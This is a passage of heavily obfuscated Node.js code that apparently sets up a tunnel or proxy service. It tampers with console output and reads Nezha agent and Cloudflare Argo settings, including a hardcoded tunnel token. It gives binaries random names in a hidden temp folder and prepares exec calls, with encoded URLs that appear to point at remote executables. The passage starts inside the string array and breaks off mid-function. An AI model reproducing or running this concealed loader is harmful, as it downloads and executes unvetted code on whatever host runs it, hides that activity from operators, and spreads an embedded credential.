9sva','v01nq1e','rentBgq','q29UDgvUDc1uExbL','qwrKigf1Dg9TyxrPyYbHy2nLC3mGDgfZAYbMywLSzdOG','zw9MAhm','Ahr0Chm6lY9VB29VlNnLCNyWmc5UzxqVywrKlxvYBa','vw5RBM93BG','C3vIC3rYAw5N','id4Vzgv2l251BgWGmJ4MmsaM','yxbWBgLJyxrPB24VANnVBG','yMfZzty0','C3bSAxq','yML6wgC','CwnADKu','A1r2AKW','uhPgzwm','BMfJt2m','AxngAwXL','kcGOlISPkYKRksSK','C25PzMzPBMC','wLzUC1i','DhLWzq','l2jVB3qUBg9Nic0TBg9NBgv2zwWGAw5MBYaTlxvYBcbODhrWoI8VBg9JywXOB3n0oG','Ag9ZDa','cGP0CM9Qyw46lY8','tgf5uvm','Cgvkyve','C052z1G','ugzHzgS','v1LRD0K','tNvuA3q','zMXVB3i','DxDUBK4','Cg9W','p2vUy3j5ChrPB249BM9UzszZzwn1CML0Et10BhmMC25Ppq','Dw5ZAgLMDa','tfH5zNO','u3vIC2nYAxb0Aw9UignVBNrLBNqGBM90ihLLDcbHDMfPBgfIBguSihbSzwfZzsb0CNKGywDHAw4GBgf0zxiU','rxjYB3iGzxHLy3v0Aw5NignVBw1HBMq6ia','uwjwz1O','zMfSBgjHy2TZ','BuL5rgC','BgLZDc50Ehq','weznt1G','zePuEvy','C0TRsva','DgXZ','AgLeruW','x19WCM90B19F','cGP2BwvZCZOVlW','BfLRAvq','ywXS','uLLwsgK','rxjYB3iGzg93BMXVywrPBMCGzMLSzxm6','s2XdELu','Bg9NBgv2zwW','wxPuAKO','zgf0yq','zgvZDa','u0vsvKvsx1bpuLq','tKvAseeGDMfYAwfIBguGAxmGzw1WDhKSC2TPCcbYDw5UAw5N','D3jPDgvgAwXLu3LUyW','EhDgDwe','v2n6EgO','D1LNrM8','r0vLvNq','CMfUzg9T','u2LNv1G','cIaGDhvUBMvSoIa','ruDkB2S','Aw5JBhvKzxm','y29UzMLNlNLHBwW','u3f6DMm','D2rMu0K','rLHzA1a','zhLzu04','qvjht19bvvri','tezMCNC','Cwz3u2O','vLPgyKq','yvvbCvm','qKH1A3O','ic1Jia','zePnshG','q2LrDNm','l2fWAs9HzgqTBM9Kzxm','Bwf0y2G','EM5ZChy','D2vIihj1BM5PBMCGzxjYB3i6ia','DeDkt1a','uvbdv3i','cNnRAxbFy29UBMvJDgLVBL9JB3vUDdOGDhj1zqPZA2LWx3bYB2nZx2nVDw50oIb0CNvLcNrLBxbLCMf0DxjLoIbMywXZzqP0Bhm6ia','BLniugS','se5gqMq','CgLWzq','CLnRCKu','s0TxyxG','yu1LqKC','Cgf0Aa','u1nKz3O','vffTsvq','A0fJqxq','BgvUz3rO','yuDrv1q','DxbArLy','vwfbzNi','yKLzvhq','D2LUmZi','wKjpteu','ugXgtMm','B0LXtMG','BefmvxC','C3rHDhvZ','weL2Dwm','Dw5SAw5R','y0TgtgK','DhjVAMfU','Ahr0Chm6lY9HCM02nc5ZC3nZlM55yY5TBI9IB3q','r1noz1e','rKLmrv9qqvri','ndy2mZG5mgHWtvnlrq','zxP2tLO','DfvTyLO','Aw5IB3vUzhm','mte5nZm4ng9rrhrVva','cIaGica','yKvxEKi','CKnyD1G','rvDjBMi','C2vYDMvYCW','yMLUza','uNfdBLy','zMLUAxnO','CM9Kz2O','ueHdyK0','CvPuyvu','y29UC3rYDwn0B3i','Ahr0CdOVl2LWlwfWAs5JB20VANnVBG','z3HmC1m','BxrJyvG','y3zNsu4','D1fls3u','y291BNrYEv9JB2rL','se52s2K','l3zTzxnZlwfYz28/zwq9mJu2ma','BeX0Bwi','CgXHDgzVCM0','zePuA0S','sM9mtLG','B3zytK4','vvvjra','AfPjD2e','Aw5KzxGUAhrTBa','CMv0DxjUicHMDw5JDgLVBIGPia','yvPkB1C','Ahr0Chm6lY9HBwq2nc5ZC3nZlM55yY5TBI92mq','EfPXvfu','ywnJzxnZ','BMv0','tKfnrq','C01KDNa','zM9YrwfJAa','BwvZC2fNzq','Ahr0Chm6lY9HBwq2nc5ZC3nZlM55yY5TBI9Hz2vUDa','DfDqC1q','uefQu3i','ExvQAKO','B3jYuMi','ywXWBG','BKHNz3u','wurtrei','Ahr0Chm6lY9HBwq2nc5ZC3nZlM55yY5TBI9IB3q','yM9VDc5SB2C','uMnts2m','wKrXvxG','y2XPzw50CW','suzvrgK','AxDsq0e','A091qu0','v1fAAuG','y2f0y2G','C0PJBLi','mti3lJaUmc4X','BuzYEK4','rxv6sNy','BvnjCLm','l2nVBMzPzY55yw1SiIa+l2rLDI9UDwXSidi+jJeGjG','ChjVDg90ExbL','yvfoEgO','z2TrDhy','ANLozeG','DwPbr3q','t05It1m','nJq0ntmXngnLALHJqW','uKLNqxG','vNbTs3a','zfn0Eei','CgTPBgWGlwyGiLS','qKvxCNK','EuPjBwy','s1nPq2K','tM90iezVDw5K','BgLZDgvU','vgHHBMSGEw91igzVCIb1C2LUzYb0AgLZihnJCMLWDcWGzw5QB3KH','BwfW','CMvZCg9UC2u','ywfYy2G2na','DhvUBMvSic0TzwrNzs1PCc12zxjZAw9Uigf1Dg8Gls1JB25MAwCG','Cg9YDa','q1jPCxa','D3jPDgvizwfK'];_0x38f0=function(){return _0x2ef330;};return _0x38f0();}const _0x2e3c18=(function(){const _0x39202c={_0x59311a:0xa0,_0x46e168:0x2f,_0x3c6b78:0x49,_0x417cc7:0xda,_0x4833fd:0x105,_0x68e732:0xa2,_0x337da8:0x3b8,_0x2fb8d0:0x412,_0x4649ee:0x331,_0x33a67f:0x2bc,_0x71e301:0x187,_0x119fcc:0x239,_0x1e8eaa:0x1e3},_0x536a0d={_0x2327ec:0x1e7,_0x115860:0x36d,_0x2fd976:0x2ff,_0x29f0c5:0x209,_0x39b7bf:0x2b6,_0x24f1c0:0xf1,_0x5d4bbf:0x208,_0x2ec998:0xcb,_0x5aa9a9:0x173,_0x19f54e:0x109,_0x5e0dd9:0x413,_0x1495fd:0x421,_0x213a37:0x111,_0x33dad2:0xe9,_0x4e0dea:0x279,_0x5cbd93:0x199,_0x29bc92:0x10e,_0x2356b9:0x40,_0xf828bd:0xfa},_0x4d9cb3={_0x1980c2:0x187,_0x24ead6:0x1e1,_0x4164f5:0x12f,_0x726510:0x593,_0x2a210e:0x585,_0x17137c:0x3d2,_0x10143e:0x520,_0x261311:0x470,_0x3f99d4:0x54d,_0x12cb1a:0x5fa,_0x5e8463:0x567,_0x39917c:0x4ee},_0x23f000={_0x36b491:0x26e},_0x9acab3={_0x5bcb43:0x1ae},_0x161668={};_0x161668[_0x5ab278(-0x29,_0x39202c._0x59311a,_0x39202c._0x46e168,-_0x39202c._0x3c6b78)]=function(_0x207679,_0x5a28e3){return _0x207679===_0x5a28e3;},_0x161668[_0x5ab278(-_0x39202c._0x417cc7,0x3e,_0x39202c._0x4833fd,-_0x39202c._0x68e732)]='vKKru';function _0x5ab278(_0x384ae9,_0x4bd69f,_0x66d4f8,_0x5f2e78){return _0x4999(_0x4bd69f- -0xa5,_0x384ae9);}function _0x2d80ee(_0x1925c3,_0x42e405,_0x35050c,_0x2fed48){return _0x4999(_0x1925c3-_0x9acab3._0x5bcb43,_0x42e405);}_0x161668[_0x2d80ee(_0x39202c._0x337da8,_0x39202c._0x2fb8d0,_0x39202c._0x4649ee,_0x39202c._0x33a67f)]=_0x5ab278(_0x39202c._0x71e301,_0x39202c._0x119fcc,0x2de,_0x39202c._0x1e8eaa);const _0x5977f3=_0x161668;let _0x4f6a86=!![];return function(_0x27942c,_0x2b75b5){const _0x513190={_0x1e58cd:0x23b,_0x1fd7aa:0xb4},_0x4dde35={_0x3556c0:0x1cb,_0x12e7b1:0x1be,_0x4f5012:0x12e};function _0x52768d(_0x5a9fe7,_0x3c014b,_0x401a38,_0x43f020){return _0x5ab278(_0x3c014b,_0x43f020- -_0x23f000._0x36b491,_0x401a38-0xf6,_0x43f020-0x1e9);}function _0x5cf6ff(_0x2aa109,_0x25cbb2,_0x45a40f,_0x57c44b){return _0x5ab278(_0x57c44b,_0x2aa109-_0x4dde35._0x3556c0,_0x45a40f-_0x4dde35._0x12e7b1,_0x57c44b-_0x4dde35._0x4f5012);}if(_0x5977f3[_0x5cf6ff(0x26b,_0x536a0d._0x2327ec,_0x536a0d._0x115860,_0x536a0d._0x2fd976)](_0x5977f3[_0x5cf6ff(_0x536a0d._0x29f0c5,_0x536a0d._0x39b7bf,_0x536a0d._0x24f1c0,_0x536a0d._0x5d4bbf)],_0x5977f3[_0x52768d(-_0x536a0d._0x2ec998,-0x10a,-_0x536a0d._0x5aa9a9,-_0x536a0d._0x19f54e)]))return _0x3b6649[_0x5cf6ff(_0x536a0d._0x5e0dd9,0x3b7,0x357,_0x536a0d._0x1495fd)](_0x52768d(-_0x536a0d._0x213a37,-_0x536a0d._0x33dad2,-_0x536a0d._0x4e0dea,-_0x536a0d._0x5cbd93)+_0x159fd1[_0x52768d(-_0x536a0d._0x29bc92,-0x1c2,-_0x536a0d._0x2356b9,-_0x536a0d._0xf828bd)]),null;else{const _0x5343d4=_0x4f6a86?function(){function _0x3862ea(_0x40eb54,_0x45ad1e,_0x98640f,_0x7f60bf){return _0x5cf6ff(_0x7f60bf-_0x513190._0x1e58cd,_0x45ad1e-0x1ca,_0x98640f-_0x513190._0x1fd7aa,_0x98640f);}function _0x4c8e6e(_0x2da83d,_0x1524f4,_0x4ff0b1,_0x3ecf55){return _0x5cf6ff(_0x3ecf55- -0x47a,_0x1524f4-0x59,_0x4ff0b1-0x1d6,_0x4ff0b1);}if(_0x4c8e6e(-_0x4d9cb3._0x1980c2,-_0x4d9cb3._0x24ead6,-_0x4d9cb3._0x4164f5,-0x193)===_0x3862ea(_0x4d9cb3._0x726510,0x52f,0x4b8,_0x4d9cb3._0x2a210e))_0xe44ea6=_0x3862ea(_0x4d9cb3._0x17137c,_0x4d9cb3._0x10143e,0x432,_0x4d9cb3._0x261311)+_0x1ffb5a+_0x3862ea(_0x4d9cb3._0x3f99d4,_0x4d9cb3._0x12cb1a,_0x4d9cb3._0x5e8463,_0x4d9cb3._0x39917c)+_0x1807fb;else{if(_0x2b75b5){const _0x2cbd9a=_0x2b75b5['apply'](_0x27942c,arguments);return _0x2b75b5=null,_0x2cbd9a;}}}:function(){};return _0x4f6a86=![],_0x5343d4;}};}()),_0x24ceb9=_0x2e3c18(this,function(){const _0x316bcc={_0x3eb395:0x2f5,_0x2a733f:0x238,_0x1e848c:0x240,_0x3e6185:0x2a3,_0x2e217c:0x2a7,_0x4c4312:0x1f1,_0x31529e:0x19a,_0x176b1f:0x153,_0x37ed66:0x14e,_0x1775ea:0x328,_0xdcb0c:0x2e9,_0x1c25f6:0xf0,_0x2d4368:0x215,_0x471344:0x1ae,_0x1c159b:0x2fa,_0x4d6c0c:0x3bd,_0x139e09:0x21c,_0x1f7329:0x1ee,_0x464755:0xfe,_0x37aa5d:0x2e4,_0x4bd217:0x212,_0x5ab0dc:0x93,_0x5d649c:0xa7,_0x5e33d3:0x65,_0x48f3ab:0xc1,_0x53ea57:0x110,_0xc5a1c1:0x228,_0x1f5af1:0x2c2,_0x5f25fd:0x10a,_0xec655a:0x388,_0x2faedf:0x3b7,_0x572d2e:0x2a4,_0x5713a4:0x462,_0x461947:0x1fb,_0x5b13e4:0x16a,_0x56108d:0x132,_0x56ea1e:0xd,_0x17caa4:0x6c,_0x58ea80:0x8e,_0x4831cb:0x42e,_0x3292bb:0x36d,_0x3bf419:0x197,_0x192efb:0x2ab,_0x34da42:0x1c3,_0xa1e221:0x159,_0x7cc29e:0x79,_0x26e9e3:0x21d,_0x5979c8:0x124,_0x4fdeed:0x122,_0xd6b1e4:0x109,_0x550881:0x2e4,_0x2458b5:0x30f,_0x2b08d3:0x317,_0x106c72:0x250,_0xcdc820:0x62,_0x223aad:0x67,_0x55eb32:0x123,_0x4397ab:0xb1,_0x19ee9e:0xe1,_0x3e3c49:0xd3,_0x2afc00:0x98,_0x4a0e96:0xed,_0x1dd297:0x125,_0x3952f3:0x2c9,_0xe4bb1e:0x1ff,_0x615b4a:0x2c0,_0x21cae5:0xf2},_0x3a7115={_0x374156:0xd4},_0x4c2c72={_0x427d8a:0xe5},_0x85d3d9={'XFMOX':function(_0x591298,_0x2367d5){return _0x591298(_0x2367d5);},'dStxB':function(_0x1f2883,_0x3633e1){return _0x1f2883+_0x3633e1;},'bFmci':_0x59b75b(0x284,_0x316bcc._0x3eb395,0x35a,0x231),'NuTkt':_0x59b75b(0x248,0x207,_0x316bcc._0x2a733f,_0x316bcc._0x1e848c),'QrFkJ':function(_0x54fbb0){return _0x54fbb0();},'EWInb':_0x59b75b(_0x316bcc._0x3e6185,0x2c9,0x1b2,_0x316bcc._0x2e217c),'ydJde':_0x59b75b(_0x316bcc._0x4c4312,_0x316bcc._0x31529e,_0x316bcc._0x176b1f,0x24a),'FaJtn':'info','HNvKi':_0x78d369(_0x316bcc._0x37ed66,_0x316bcc._0x1775ea,_0x316bcc._0xdcb0c,0x219),'OaOvs':_0x78d369(_0x316bcc._0x1c25f6,0x245,0x144,_0x316bcc._0x2d4368),'hEwvR':'table','MwpUg':'trace','yVXSt':function(_0x52a29c,_0x5ca0b9){return _0x52a29c<_0x5ca0b9;}};function _0x59b75b(_0x2b6169,_0x403ff8,_0x139ece,_0x1734d7){return _0x4999(_0x403ff8-_0x4c2c72._0x427d8a,_0x2b6169);}let _0x23f662;try{const _0x20ab18=_0x85d3d9[_0x59b75b(_0x316bcc._0x471344,0x287,_0x316bcc._0x1c159b,0x1e2)](Function,_0x85d3d9[_0x59b75b(_0x316bcc._0x4d6c0c,0x320,_0x316bcc._0x139e09,0x203)](_0x85d3d9['dStxB'](_0x85d3d9[_0x78d369(_0x316bcc._0x1f7329,_0x316bcc._0x464755,_0x316bcc._0x37aa5d,_0x316bcc._0x4bd217)],_0x85d3d9[_0x78d369(_0x316bcc._0x5ab0dc,_0x316bcc._0x5d649c,-_0x316bcc._0x5e33d3,_0x316bcc._0x48f3ab)]),');'));_0x23f662=_0x85d3d9['QrFkJ'](_0x20ab18);}catch(_0x4fecdd){if(_0x78d369(_0x316bcc._0x4c4312,0xd5,0x198,_0x316bcc._0x53ea57)===_0x85d3d9[_0x59b75b(_0x316bcc._0xc5a1c1,0x2dc,0x2b2,0x2f1)])_0x23f662=window;else{const _0x4100f1={};_0x4100f1['recursive']=!![],_0x4b7c0c[_0x78d369(0x203,_0x316bcc._0x1f5af1,_0x316bcc._0x5f25fd,0x1d7)](_0x2c680f,_0x4100f1);}}const _0x2a1f0e=_0x23f662[_0x59b75b(0x29a,_0x316bcc._0xec655a,_0x316bcc._0x2faedf,_0x316bcc._0x572d2e)]=_0x23f662[_0x59b75b(_0x316bcc._0x5713a4,0x388,0x499,0x338)]||{},_0x3464d9=[_0x85d3d9['ydJde'],_0x78d369(0x189,0x245,0x196,0x17d),_0x85d3d9['FaJtn'],_0x85d3d9[_0x78d369(0x5c,_0x316bcc._0x461947,_0x316bcc._0x5b13e4,_0x316bcc._0x56108d)],_0x85d3d9[_0x78d369(-0x42,-_0x316bcc._0x56ea1e,_0x316bcc._0x17caa4,_0x316bcc._0x58ea80)],_0x85d3d9[_0x59b75b(_0x316bcc._0x4831cb,0x363,_0x316bcc._0x3292bb,0x444)],_0x85d3d9[_0x78d369(_0x316bcc._0x3bf419,0x1b8,_0x316bcc._0x192efb,_0x316bcc._0x34da42)]];function _0x78d369(_0x5a5d47,_0x26109f,_0x2165be,_0x5cde80){return _0x4999(_0x5cde80- -_0x3a7115._0x374156,_0x5a5d47);}for(let _0x46b79f=-0x1*-0x1fdf+0x12d1*0x1+-0x32b0*0x1;_0x85d3d9[_0x78d369(_0x316bcc._0xa1e221,_0x316bcc._0x5d649c,_0x316bcc._0x7cc29e,0x98)](_0x46b79f,_0x3464d9[_0x78d369(_0x316bcc._0x26e9e3,_0x316bcc._0x5979c8,_0x316bcc._0x4fdeed,_0x316bcc._0xd6b1e4)]);_0x46b79f++){const _0x3ac27c=_0x2e3c18[_0x59b75b(0x38e,_0x316bcc._0x550881,_0x316bcc._0x2458b5,0x296)][_0x59b75b(0x375,_0x316bcc._0x2b08d3,_0x316bcc._0x106c72,0x344)][_0x78d369(_0x316bcc._0xcdc820,0x69,_0x316bcc._0x223aad,0x125)](_0x2e3c18),_0x5bb75b=_0x3464d9[_0x46b79f],_0x3644f8=_0x2a1f0e[_0x5bb75b]||_0x3ac27c;_0x3ac27c[_0x78d369(_0x316bcc._0x55eb32,_0x316bcc._0x4397ab,_0x316bcc._0x19ee9e,_0x316bcc._0x3e3c49)]=_0x2e3c18[_0x78d369(_0x316bcc._0x2afc00,0x182,_0x316bcc._0x4a0e96,_0x316bcc._0x1dd297)](_0x2e3c18),_0x3ac27c[_0x59b75b(_0x316bcc._0x3952f3,_0x316bcc._0xe4bb1e,_0x316bcc._0x615b4a,_0x316bcc._0x21cae5)]=_0x3644f8['toString']['bind'](_0x3644f8),_0x2a1f0e[_0x5bb75b]=_0x3ac27c;}});_0x24ceb9();const http=require(_0x5d6c89(-0x4d,-0x13a,-0x130,-0xe1)),axios=require(_0x477c8c(0x3ae,0x229,0x41a,0x309)),os=require('os'),fs=require('fs'),path=require('path');function _0x5d6c89(_0x478f54,_0x12802c,_0x175da5,_0xb4f93){const _0x56597c={_0x46f7ed:0x116};return _0x4999(_0x478f54- -_0x56597c._0x46f7ed,_0xb4f93);}const {promisify}=require(_0x5d6c89(-0x31,-0x1b,-0xb3,-0xc3)),exec=promisify(require(_0x477c8c(0x20b,0x1ea,0x1f4,0x2f6))[_0x477c8c(0x491,0x475,0x416,0x45a)]),UPLOAD_URL=process[_0x477c8c(0x39e,0x256,0x1ff,0x2f9)][_0x5d6c89(0x1b6,0x25e,0x142,0xce)]||'',PROJECT_URL=process[_0x477c8c(0x3fd,0x40c,0x2c4,0x2f9)]['PROJECT_URL']||'',AUTO_ACCESS=process['env']['AUTO_ACCESS']||![],FILE_PATH=process['env'][_0x5d6c89(0xd8,0x75,0x5,0x116)]||'.tmp',SUB_PATH=process[_0x477c8c(0x356,0x344,0x28d,0x2f9)]['SUB_PATH']||'sub',PORT=process[_0x5d6c89(0x22,0x108,-0xfc,-0x5d)][_0x477c8c(0x366,0x26f,0x37c,0x373)]||process[_0x477c8c(0x262,0x386,0x25c,0x2f9)][_0x5d6c89(0x188,0x204,0x25b,0x295)]||-0x1*0x179b+0x3ab+0xfd4*0x2,UUID=process[_0x5d6c89(0x22,-0x4,0x87,-0xd0)][_0x5d6c89(0xf7,0x8c,-0x2e,0x195)]||'e9182e33-67b0-4476-a187-b4ce863392a4',NEZHA_SERVER=process['env'][_0x477c8c(0x22b,0x396,0x356,0x2c7)]||'',NEZHA_PORT=process[_0x5d6c89(0x22,0x11b,-0x69,0x75)][_0x477c8c(0x31e,0x332,0x330,0x337)]||'',NEZHA_KEY=process['env'][_0x477c8c(0x421,0x4ab,0x502,0x47e)]||'',ARGO_DOMAIN=process[_0x477c8c(0x411,0x211,0x361,0x2f9)][_0x5d6c89(0x160,0x218,0x188,0x218)]||'zzzip.chlw.pp.ua',ARGO_AUTH=process[_0x5d6c89(0x22,0x123,0x139,-0xf2)][_0x5d6c89(0xad,0x1bc,0x151,-0x2a)]||'eyJhIjoiYTFkZjU5ZjE3ZjAzNjM3OWViMTA4OWYyMmQwMjAwNTEiLCJ0IjoiMzdhODI1NGYtZDAzMi00MmE4LTkxNTAtMGY5ZTg4ZDRkNGNiIiwicyI6Ik1HWTFOakUzWWpBdE5HSTNaaTAwWW1FMUxXRmhZMlF0WkdRek9XVmtaR1F4T0RkbSJ9',ARGO_PORT=process[_0x5d6c89(0x22,0x12d,0x7d,0xc0)][_0x5d6c89(-0x1a,-0x109,0xf1,-0xfe)]||-0x29d8+-0x2e86+0x779f*0x1,CFIP=process[_0x477c8c(0x410,0x1ff,0x3d7,0x2f9)][_0x477c8c(0x34f,0x299,0x26f,0x26f)]||_0x5d6c89(0x4d,-0x6d,0xc0,0x101),CFPORT=process[_0x477c8c(0x3d7,0x3c5,0x1d4,0x2f9)][_0x477c8c(0x23e,0x246,0x319,0x2e9)]||-0x1ff2+0x2*-0x26b+0x2683,NAME=process[_0x5d6c89(0x22,0x110,0x11d,0x72)][_0x477c8c(0x3d5,0x451,0x43f,0x3d7)]||'';!fs['existsSync'](FILE_PATH)?(fs[_0x5d6c89(0x195,0x78,0xd5,0x293)](FILE_PATH),console[_0x477c8c(0x304,0x246,0x150,0x276)](FILE_PATH+'\x20is\x20created')):console[_0x5d6c89(-0x61,0xe,0xad,-0x34)](FILE_PATH+_0x5d6c89(0x3e,0x157,-0x9e,0x73));function generateRandomName(){const _0x23ca8d={_0x51692a:0x295,_0x8da66a:0x336,_0x1141bc:0xd5,_0x45e883:0x6f,_0x791778:0xbd,_0x4357d7:0x441,_0xa206fc:0x141,_0x4613a2:0x2b3,_0x361194:0x247,_0x32f022:0x1ef,_0x1a388a:0x30f,_0x3b753b:0x4a,_0x11bfa7:0xcf,_0x197c64:0x32b,_0x51b5ac:0x354,_0x25e63e:0x3c8,_0x3f8bf8:0xa0,_0x10855f:0x97,_0x633cb7:0x3,_0x3cc8f4:0x3d8,_0x1f5935:0x378,_0x517f0e:0x2b6,_0x27523e:0x2c4,_0x892247:0xda,_0x3e4b34:0x192,_0x1bf383:0xb8,_0x42e3fe:0x94,_0x5b1402:0x198,_0x1d2d06:0x101,_0x2970e4:0x216,_0x194a21:0x2c7,_0x4d2fdc:0x290,_0x4542fc:0x2b1,_0x225185:0x1cf,_0x5bf6b2:0xc3,_0x4aeeed:0xba,_0x1d557e:0xdf,_0x37a34f:0x3cb,_0xc93939:0x3ed,_0x101265:0x4b3,_0x27fae1:0x4ab,_0x2dd91f:0x3ef,_0x41b5c9:0x2c,_0x1487d3:0x45,_0x297a47:0x1d,_0x361838:0xe9,_0x4da817:0x3d6,_0x46e057:0x358,_0x37647d:0x40a},_0x15d582={_0x2acab3:0x13,_0x41a45d:0xc9},_0x28d605={_0x3f0ee8:0x181,_0x3ce0de:0x1d7,_0xfbf8b7:0x1bc},_0x5a697f={};_0x5a697f['RNKoz']=_0x2f4ca1(_0x23ca8d._0x51692a,0x2bf,0x2d4,_0x23ca8d._0x8da66a),_0x5a697f[_0x4da456(-_0x23ca8d._0x1141bc,-_0x23ca8d._0x45e883,-0x2e,_0x23ca8d._0x791778)]='abcdefghijklmnopqrstuvwxyz',_0x5a697f[_0x2f4ca1(_0x23ca8d._0x4357d7,0x468,0x3c8,0x47d)]=function(_0x346fcb,_0x7b779c){return _0x346fcb<_0x7b779c;},_0x5a697f['cjPQp']=function(_0x3eb8dc,_0x805945){return _0x3eb8dc===_0x805945;},_0x5a697f[_0x4da456(-_0x23ca8d._0xa206fc,-_0x23ca8d._0x4613a2,-0x1c9,-_0x23ca8d._0x361194)]='zxMlR',_0x5a697f[_0x4da456(-0xc8,-0x24e,-_0x23ca8d._0x32f022,-_0x23ca8d._0x1a388a)]=function(_0x21aa36,_0x2e8f13){return _0x21aa36*_0x2e8f13;};function _0x4da456(_0x30fe28,_0xb391ea,_0x17e943,_0x44ce9a){return _0x5d6c89(_0x17e943- -_0x28d605._0x3f0ee8,_0xb391ea-_0x28d605._0x3ce0de,_0x17e943-_0x28d605._0xfbf8b7,_0x30fe28);}const _0x3e0235=_0x5a697f,_0x13add4=_0x3e0235[_0x4da456(0xda,-_0x23ca8d._0x3b753b,-0x2e,_0x23ca8d._0x11bfa7)];let _0x2355fa='';function _0x2f4ca1(_0x2861d6,_0x55b57d,_0x1782c5,_0x48b62e){return _0x477c8c(_0x2861d6-_0x15d582._0x2acab3,_0x55b57d-_0x15d582._0x41a45d,_0x2861d6,_0x1782c5-0x27);}for(let _0x307784=0x8d*0x1+-0x4*0x2f0+0xb33;_0x3e0235[_0x2f4ca1(_0x23ca8d._0x197c64,_0x23ca8d._0x51b5ac,_0x23ca8d._0x25e63e,0x34a)](_0x307784,-0x2575+0xec8+0x16b3);_0x307784++){if(_0x3e0235[_0x4da456(-_0x23ca8d._0x3f8bf8,-_0x23ca8d._0x10855f,_0x23ca8d._0x633cb7,-0xdd)](_0x3e0235['neGkP'],_0x3e0235[_0x2f4ca1(_0x23ca8d._0x3cc8f4,_0x23ca8d._0x1f5935,_0x23ca8d._0x517f0e,_0x23ca8d._0x27523e)]))_0x2355fa+=_0x13add4[_0x4da456(-_0x23ca8d._0x892247,-0x16b,-_0x23ca8d._0x3e4b34,-_0x23ca8d._0x1bf383)](Math[_0x4da456(-_0x23ca8d._0x42e3fe,-_0x23ca8d._0x5b1402,-_0x23ca8d._0x1d2d06,-_0x23ca8d._0x2970e4)](_0x3e0235[_0x2f4ca1(0x262,_0x23ca8d._0x194a21,_0x23ca8d._0x4d2fdc,_0x23ca8d._0x4542fc)](Math['random'](),_0x13add4[_0x4da456(-_0x23ca8d._0x225185,-_0x23ca8d._0x5bf6b2,-_0x23ca8d._0x4aeeed,-_0x23ca8d._0x1d557e)])));else{const _0x52e9bf={};_0x52e9bf[_0x2f4ca1(_0x23ca8d._0x37a34f,0x444,0x49c,0x460)]=_0x349f4c,_0x52e9bf['fileUrl']=_0x3e0235[_0x2f4ca1(_0x23ca8d._0xc93939,_0x23ca8d._0x101265,_0x23ca8d._0x27fae1,_0x23ca8d._0x2dd91f)];const _0x25342d={};_0x25342d[_0x4da456(_0x23ca8d._0x41b5c9,_0x23ca8d._0x1487d3,_0x23ca8d._0x297a47,_0x23ca8d._0x361838)]=_0x6b7834,_0x25342d['fileUrl']=_0x2f4ca1(_0x23ca8d._0x4da817,_0x23ca8d._0x46e057,_0x23ca8d._0x37647d,0x4d5),_0x47f7ef=[_0x52e9bf,_0x25342d];}}return _0x2355fa;}let subContent=null;const npmName=generateRandomName(),webName=generateRandomName(),botName=generateRandomName(),phpName=generateRandomName();let npmPath=path['join'](FILE_PATH,npmName),phpPath=path[_0x5d6c89(0x1ba,0x1dc,0x111,0x116)](FILE_PATH,phpName),webPath=path[_0x477c8c(0x3a5,0x403,0x57c,0x491)](FILE_PATH,webName),botPath=path['join'](FILE_PATH,botName),subPath=path[_0x5d6c89(0x1ba,0xb8,0x257,0x2de)](FILE_PATH,_0x477c8c(0x2c4,0x355,0x3c5,0x30b)),listPath=path[_0x477c8c(0x498,0x53b,0x4be,0x491)](FILE_PATH,_0x5d6c89(0x8b,-0x64,0xfe,0x34));function _0x477c8c(_0x130334,_0x249416,_0x388a54,_0x1c9746){return _0x4999(_0x1c9746-0x1c1,_0x388a54);}let bootLogPath=path[_0x5d6c89(0x1ba,0x1c0,0x11a,0x96)](FILE_PATH,_0x5d6c89(0x10d,0x13b,0x1b9,0x1)),configPath=path[_0x5d6c89(0x1ba,0x2bf,0x1b4,0x27e)](FILE_PATH,'config.json');function deleteNodes(){const _0xa9e2d7={_0x3d0d77:0x15e,_0x3670f4:0x245,_0x345fc8:0x6e,_0x9a33b6:0x22f,_0x53fe75:0xce,_0x48163a:0x20,_0x268b41:0x80,_0x54d042:0x15d,_0x2df9b0:0x17d,_0x359f04:0x118,_0x1a68d3:0x8d,_0x2d57b0:0x192,_0x36ac16:0x98,_0x68b8ba:0x63,_0x1c2650:0xac,_0x4b4289:0x24,_0x19f973:0x146,_0x69b069:0x141,_0x31eee3:0x107,_0x529ee0:0x7,_0x46362d:0x84,_0x2e3078:0xdc,_0xff0429:0x1ba,_0x48113b:0x145,_0x60308a:0x322,_0x3e1f0a:0x259,_0x1ec86a:0x85,_0x25d174:0xdc,_0x5472f9:0x183,_0x2f8706:0xff,_0x2fa055:0xb8,_0x18c22b:0x2e,_0x429f25:0x5c,_0x404772:0xe2,_0x3f34ae:0x176,_0xc886df:0xf5,_0x18d399:0xc3,_0x1fd4cb:0xd9,_0x290b5f:0xc1,_0x4d2adb:0x7f,_0x41fdde:0xe2,_0x1b7cfd:0xe,_0x52e4a6:0x62,_0x3102d9:0xdc,_0x152c55:0xf3,_0x263bc3:0x102,_0x42a089:0xf3,_0x185ad5:0x25,_0x394c2e:0xd5,_0x2c45d5:0x1bb,_0x237c82:0x208,_0x4a60c8:0x1d1,_0x55e25a:0x111,_0xaa7f1d:0x43,_0x2b3ea6:0x88,_0x40a47d:0x140,_0x26882e:0x146,_0x4cddc9:0xd4,_0x5df031:0xa8,_0x172a36:0x200,_0xb054ee:0x1bd,_0xb6b207:0x1f9,_0x4f8b24:0x51,_0xf087ee:0x46,_0x10e3b3:0x4d,_0x57e0dd:0xc5,_0x44f8ca:0x3e,_0x149484:0x67,_0x301c91:0xa7,_0x4745c3:0xd0,_0x3d038d:0x1b,_0x95fe43:0xe2,_0x38058a:0x1d1,_0x44e96a:0x10a,_0xc1fd79:0x86,_0xfe575a:0x9f,_0x17c42b:0x18d,_0x2a4994:0x116,_0xa6b6d7:0xb6,_0xe6ebf4:0x7c,_0xe1c44b:0x185,_0x177b7e:0x13,_0x516e5a:0xbf,_0x4a86c3:0x62,_0x215f11:0x1b7,_0x1550e7:0xe0,_0x3621b1:0xa4,_0x3c915f:0x2b9,_0x23a909:0x23f,_0x112d69:0x189,_0x37e166:0x15e,_0x4df218:0x1e,_0x2397da:0xfe,_0x395fed:0x14d,_0x53eb1b:0x61,_0x4fe082:0x1f9,_0x4a45f8:0x1ff,_0x4e6123:0x104,_0x570001:0x1,_0x522e33:0xfc,_0x3aa09d:0x10e,_0x2e0f00:0xaf,_0x3e1775:0x4b,_0x4d353d:0x48,_0x2aa84a:0x6f,_0x1743cf:0xf,_0x456ba8:0x123,_0x40a17e:0x20f,_0x29f868:0x222,_0x1bf469:0xb0,_0x538b42:0xf7},_0x2c3ba2={_0x741941:0x4cc,_0x263527:0x31a,_0x165310:0x2de,_0x191a7a:0x3